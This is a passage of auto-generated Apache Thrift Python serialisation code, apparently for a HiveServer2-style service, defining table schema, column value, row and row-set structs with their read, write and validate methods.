iter24.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.types is None:
raise TProtocol.TProtocolException(message='Required field types is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TColumnDesc(object):
"""
Attributes:
- columnName
- typeDesc
- position
- comment
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'columnName', None, None, ), # 1
(2, TType.STRUCT, 'typeDesc', (TTypeDesc, TTypeDesc.thrift_spec), None, ), # 2
(3, TType.I32, 'position', None, None, ), # 3
(4, TType.STRING, 'comment', None, None, ), # 4
)
def __init__(self, columnName=None, typeDesc=None, position=None, comment=None,):
self.columnName = columnName
self.typeDesc = typeDesc
self.position = position
self.comment = comment
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.columnName = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.typeDesc = TTypeDesc()
self.typeDesc.read(iprot)
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I32:
self.position = iprot.readI32();
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.STRING:
self.comment = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TColumnDesc')
if self.columnName is not None:
oprot.writeFieldBegin('columnName', TType.STRING, 1)
oprot.writeString(self.columnName)
oprot.writeFieldEnd()
if self.typeDesc is not None:
oprot.writeFieldBegin('typeDesc', TType.STRUCT, 2)
self.typeDesc.write(oprot)
oprot.writeFieldEnd()
if self.position is not None:
oprot.writeFieldBegin('position', TType.I32, 3)
oprot.writeI32(self.position)
oprot.writeFieldEnd()
if self.comment is not None:
oprot.writeFieldBegin('comment', TType.STRING, 4)
oprot.writeString(self.comment)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.columnName is None:
raise TProtocol.TProtocolException(message='Required field columnName is unset!')
if self.typeDesc is None:
raise TProtocol.TProtocolException(message='Required field typeDesc is unset!')
if self.position is None:
raise TProtocol.TProtocolException(message='Required field position is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TTableSchema(object):
"""
Attributes:
- columns
"""
thrift_spec = (
None, # 0
(1, TType.LIST, 'columns', (TType.STRUCT,(TColumnDesc, TColumnDesc.thrift_spec)), None, ), # 1
)
def __init__(self, columns=None,):
self.columns = columns
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.LIST:
self.columns = []
(_etype28, _size25) = iprot.readListBegin()
for _i29 in xrange(_size25):
_elem30 = TColumnDesc()
_elem30.read(iprot)
self.columns.append(_elem30)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TTableSchema')
if self.columns is not None:
oprot.writeFieldBegin('columns', TType.LIST, 1)
oprot.writeListBegin(TType.STRUCT, len(self.columns))
for iter31 in self.columns:
iter31.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.columns is None:
raise TProtocol.TProtocolException(message='Required field columns is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TBoolValue(object):
"""
Attributes:
- value
"""
thrift_spec = (
None, # 0
(1, TType.BOOL, 'value', None, None, ), # 1
)
def __init__(self, value=None,):
self.value = value
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.BOOL:
self.value = iprot.readBool();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TBoolValue')
if self.value is not None:
oprot.writeFieldBegin('value', TType.BOOL, 1)
oprot.writeBool(self.value)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TByteValue(object):
"""
Attributes:
- value
"""
thrift_spec = (
None, # 0
(1, TType.BYTE, 'value', None, None, ), # 1
)
def __init__(self, value=None,):
self.value = value
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.BYTE:
self.value = iprot.readByte();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TByteValue')
if self.value is not None:
oprot.writeFieldBegin('value', TType.BYTE, 1)
oprot.writeByte(self.value)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TI16Value(object):
"""
Attributes:
- value
"""
thrift_spec = (
None, # 0
(1, TType.I16, 'value', None, None, ), # 1
)
def __init__(self, value=None,):
self.value = value
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I16:
self.value = iprot.readI16();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TI16Value')
if self.value is not None:
oprot.writeFieldBegin('value', TType.I16, 1)
oprot.writeI16(self.value)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TI32Value(object):
"""
Attributes:
- value
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'value', None, None, ), # 1
)
def __init__(self, value=None,):
self.value = value
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.value = iprot.readI32();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TI32Value')
if self.value is not None:
oprot.writeFieldBegin('value', TType.I32, 1)
oprot.writeI32(self.value)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TI64Value(object):
"""
Attributes:
- value
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'value', None, None, ), # 1
)
def __init__(self, value=None,):
self.value = value
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.value = iprot.readI64();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TI64Value')
if self.value is not None:
oprot.writeFieldBegin('value', TType.I64, 1)
oprot.writeI64(self.value)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TDoubleValue(object):
"""
Attributes:
- value
"""
thrift_spec = (
None, # 0
(1, TType.DOUBLE, 'value', None, None, ), # 1
)
def __init__(self, value=None,):
self.value = value
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.DOUBLE:
self.value = iprot.readDouble();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TDoubleValue')
if self.value is not None:
oprot.writeFieldBegin('value', TType.DOUBLE, 1)
oprot.writeDouble(self.value)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TStringValue(object):
"""
Attributes:
- value
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'value', None, None, ), # 1
)
def __init__(self, value=None,):
self.value = value
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.value = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TStringValue')
if self.value is not None:
oprot.writeFieldBegin('value', TType.STRING, 1)
oprot.writeString(self.value)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TColumn(object):
"""
Attributes:
- boolColumn
- byteColumn
- i16Column
- i32Column
- i64Column
- doubleColumn
- stringColumn
"""
thrift_spec = (
None, # 0
(1, TType.LIST, 'boolColumn', (TType.STRUCT,(TBoolValue, TBoolValue.thrift_spec)), None, ), # 1
(2, TType.LIST, 'byteColumn', (TType.STRUCT,(TByteValue, TByteValue.thrift_spec)), None, ), # 2
(3, TType.LIST, 'i16Column', (TType.STRUCT,(TI16Value, TI16Value.thrift_spec)), None, ), # 3
(4, TType.LIST, 'i32Column', (TType.STRUCT,(TI32Value, TI32Value.thrift_spec)), None, ), # 4
(5, TType.LIST, 'i64Column', (TType.STRUCT,(TI64Value, TI64Value.thrift_spec)), None, ), # 5
(6, TType.LIST, 'doubleColumn', (TType.STRUCT,(TDoubleValue, TDoubleValue.thrift_spec)), None, ), # 6
(7, TType.LIST, 'stringColumn', (TType.STRUCT,(TStringValue, TStringValue.thrift_spec)), None, ), # 7
)
def __init__(self, boolColumn=None, byteColumn=None, i16Column=None, i32Column=None, i64Column=None, doubleColumn=None, stringColumn=None,):
self.boolColumn = boolColumn
self.byteColumn = byteColumn
self.i16Column = i16Column
self.i32Column = i32Column
self.i64Column = i64Column
self.doubleColumn = doubleColumn
self.stringColumn = stringColumn
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.LIST:
self.boolColumn = []
(_etype35, _size32) = iprot.readListBegin()
for _i36 in xrange(_size32):
_elem37 = TBoolValue()
_elem37.read(iprot)
self.boolColumn.append(_elem37)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.LIST:
self.byteColumn = []
(_etype41, _size38) = iprot.readListBegin()
for _i42 in xrange(_size38):
_elem43 = TByteValue()
_elem43.read(iprot)
self.byteColumn.append(_elem43)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.LIST:
self.i16Column = []
(_etype47, _size44) = iprot.readListBegin()
for _i48 in xrange(_size44):
_elem49 = TI16Value()
_elem49.read(iprot)
self.i16Column.append(_elem49)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.LIST:
self.i32Column = []
(_etype53, _size50) = iprot.readListBegin()
for _i54 in xrange(_size50):
_elem55 = TI32Value()
_elem55.read(iprot)
self.i32Column.append(_elem55)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.LIST:
self.i64Column = []
(_etype59, _size56) = iprot.readListBegin()
for _i60 in xrange(_size56):
_elem61 = TI64Value()
_elem61.read(iprot)
self.i64Column.append(_elem61)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.LIST:
self.doubleColumn = []
(_etype65, _size62) = iprot.readListBegin()
for _i66 in xrange(_size62):
_elem67 = TDoubleValue()
_elem67.read(iprot)
self.doubleColumn.append(_elem67)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 7:
if ftype == TType.LIST:
self.stringColumn = []
(_etype71, _size68) = iprot.readListBegin()
for _i72 in xrange(_size68):
_elem73 = TStringValue()
_elem73.read(iprot)
self.stringColumn.append(_elem73)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TColumn')
if self.boolColumn is not None:
oprot.writeFieldBegin('boolColumn', TType.LIST, 1)
oprot.writeListBegin(TType.STRUCT, len(self.boolColumn))
for iter74 in self.boolColumn:
iter74.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.byteColumn is not None:
oprot.writeFieldBegin('byteColumn', TType.LIST, 2)
oprot.writeListBegin(TType.STRUCT, len(self.byteColumn))
for iter75 in self.byteColumn:
iter75.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.i16Column is not None:
oprot.writeFieldBegin('i16Column', TType.LIST, 3)
oprot.writeListBegin(TType.STRUCT, len(self.i16Column))
for iter76 in self.i16Column:
iter76.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.i32Column is not None:
oprot.writeFieldBegin('i32Column', TType.LIST, 4)
oprot.writeListBegin(TType.STRUCT, len(self.i32Column))
for iter77 in self.i32Column:
iter77.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.i64Column is not None:
oprot.writeFieldBegin('i64Column', TType.LIST, 5)
oprot.writeListBegin(TType.STRUCT, len(self.i64Column))
for iter78 in self.i64Column:
iter78.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.doubleColumn is not None:
oprot.writeFieldBegin('doubleColumn', TType.LIST, 6)
oprot.writeListBegin(TType.STRUCT, len(self.doubleColumn))
for iter79 in self.doubleColumn:
iter79.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.stringColumn is not None:
oprot.writeFieldBegin('stringColumn', TType.LIST, 7)
oprot.writeListBegin(TType.STRUCT, len(self.stringColumn))
for iter80 in self.stringColumn:
iter80.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TColumnValue(object):
"""
Attributes:
- boolVal
- byteVal
- i16Val
- i32Val
- i64Val
- doubleVal
- stringVal
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'boolVal', (TBoolValue, TBoolValue.thrift_spec), None, ), # 1
(2, TType.STRUCT, 'byteVal', (TByteValue, TByteValue.thrift_spec), None, ), # 2
(3, TType.STRUCT, 'i16Val', (TI16Value, TI16Value.thrift_spec), None, ), # 3
(4, TType.STRUCT, 'i32Val', (TI32Value, TI32Value.thrift_spec), None, ), # 4
(5, TType.STRUCT, 'i64Val', (TI64Value, TI64Value.thrift_spec), None, ), # 5
(6, TType.STRUCT, 'doubleVal', (TDoubleValue, TDoubleValue.thrift_spec), None, ), # 6
(7, TType.STRUCT, 'stringVal', (TStringValue, TStringValue.thrift_spec), None, ), # 7
)
def __init__(self, boolVal=None, byteVal=None, i16Val=None, i32Val=None, i64Val=None, doubleVal=None, stringVal=None,):
self.boolVal = boolVal
self.byteVal = byteVal
self.i16Val = i16Val
self.i32Val = i32Val
self.i64Val = i64Val
self.doubleVal = doubleVal
self.stringVal = stringVal
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.boolVal = TBoolValue()
self.boolVal.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.byteVal = TByteValue()
self.byteVal.read(iprot)
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRUCT:
self.i16Val = TI16Value()
self.i16Val.read(iprot)
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.STRUCT:
self.i32Val = TI32Value()
self.i32Val.read(iprot)
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.STRUCT:
self.i64Val = TI64Value()
self.i64Val.read(iprot)
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.STRUCT:
self.doubleVal = TDoubleValue()
self.doubleVal.read(iprot)
else:
iprot.skip(ftype)
elif fid == 7:
if ftype == TType.STRUCT:
self.stringVal = TStringValue()
self.stringVal.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TColumnValue')
if self.boolVal is not None:
oprot.writeFieldBegin('boolVal', TType.STRUCT, 1)
self.boolVal.write(oprot)
oprot.writeFieldEnd()
if self.byteVal is not None:
oprot.writeFieldBegin('byteVal', TType.STRUCT, 2)
self.byteVal.write(oprot)
oprot.writeFieldEnd()
if self.i16Val is not None:
oprot.writeFieldBegin('i16Val', TType.STRUCT, 3)
self.i16Val.write(oprot)
oprot.writeFieldEnd()
if self.i32Val is not None:
oprot.writeFieldBegin('i32Val', TType.STRUCT, 4)
self.i32Val.write(oprot)
oprot.writeFieldEnd()
if self.i64Val is not None:
oprot.writeFieldBegin('i64Val', TType.STRUCT, 5)
self.i64Val.write(oprot)
oprot.writeFieldEnd()
if self.doubleVal is not None:
oprot.writeFieldBegin('doubleVal', TType.STRUCT, 6)
self.doubleVal.write(oprot)
oprot.writeFieldEnd()
if self.stringVal is not None:
oprot.writeFieldBegin('stringVal', TType.STRUCT, 7)
self.stringVal.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TRow(object):
"""
Attributes:
- colVals
"""
thrift_spec = (
None, # 0
(1, TType.LIST, 'colVals', (TType.STRUCT,(TColumnValue, TColumnValue.thrift_spec)), None, ), # 1
)
def __init__(self, colVals=None,):
self.colVals = colVals
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.LIST:
self.colVals = []
(_etype84, _size81) = iprot.readListBegin()
for _i85 in xrange(_size81):
_elem86 = TColumnValue()
_elem86.read(iprot)
self.colVals.append(_elem86)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TRow')
if self.colVals is not None:
oprot.writeFieldBegin('colVals', TType.LIST, 1)
oprot.writeListBegin(TType.STRUCT, len(self.colVals))
for iter87 in self.colVals:
iter87.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.colVals is None:
raise TProtocol.TProtocolException(message='Required field colVals is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TRowSet(object):
"""
Attributes:
- startRowOffset
- rows
- columns
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'startRowOffset', None, None, ), # 1
(2, TType.LIST, 'rows', (TType.STRUCT,(TRow, TRow.thrift_spec)), None, ), # 2
(3, TType.LIST, 'columns', (TType.STRUCT,(TColumn, TColumn.thrift_spec)), None, ), # 3
)
def __init__(self, startRowOffset=None, rows=None, columns=None,):
self.startRowOffset = startRowOffset
self.rows = rows
self.columns = columns
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.startRowOffset = iprot.readI64();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.LIST:
self.rows = []
(_etype91, _size88) = iprot.readListBegin()
for _i92 in xrange(_size88):
_elem93 = TRow()
_elem93.read(iprot)
self.rows.append(_elem93)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.LIST:
self.columns = []
(_etype97, _size94) = iprot.readListBegin()
for _i98 in xrange(_size94):
_elem99 = TColumn()
_elem99.read(iprot)
self.columns.append(_elem99)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TRowSet')
if self.startRowOffset is not None:
oprot.writeFieldBegin('startRowOffset', TType.I64, 1)
oprot.writeI64(self.startRowOffset)
oprot.writeFieldEnd()
if self.rows is not None:
oprot.writeFieldBegin('rows', TType.LIST, 2)
oprot.writeListBegin(TType.STRUCT, len(self.rows))
for iter100 in self.rows:
iter100.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.columns is not None:
oprot.writeFieldBegin('columns', TType.LIST, 3)
oprot.writeListBegin(TType.STRUCT, len(self.columns))
for iter101 in self.columns:
iter101.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.startRowOffset is None:
raise TProtocol.TProtocolException(message='Required field startRowOffset is unset!')
if self.rows is None:
raise TProtocol.TProtocolException(message='Required field rows is unset!')
return
